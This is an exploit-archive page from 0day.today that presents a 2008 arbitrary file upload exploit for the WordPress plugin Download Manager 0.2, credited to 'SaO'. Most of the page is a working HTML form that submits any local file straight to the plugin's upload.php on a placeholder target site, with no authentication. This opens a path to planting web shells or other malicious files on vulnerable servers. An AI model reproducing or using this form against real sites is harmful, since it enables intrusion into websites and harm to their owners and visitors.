[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Author
SaO
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3444
Category
web applications
Date add
23-07-2008
Platform
unsorted
===================================================================
Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
===================================================================


<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2>
<h3>SaO</h3>
<i>Plugin URI: http://giulioganci.netsons.org/downloads-manager<i>
    <hr color="#f0f8ff">
    <fieldset name="upl" class="options">

    <form action="http://[site]/wp-content/plugins/downloads-manager/upload.php?up=http://[site]/wp-content/plugins/downloads-manager/upload/" method="post" enctype="multipart/form-data" name="upload">
       <table cellspacing="0" cellpadding="3">
         <tr> 
           <td>Local File</td>
         </tr>
         <tr>
           <td><input name="upfile" type="file" id="upfile" size="50"><input type="hidden" name="MAX_FILE_SIZE" value="2048"></td>
           <td><input type="submit" name="up" value="Send" class="button" /></td>
         </tr>
       </table>
    </form>
    </fieldset>



#  0day.today [2024-11-15]  #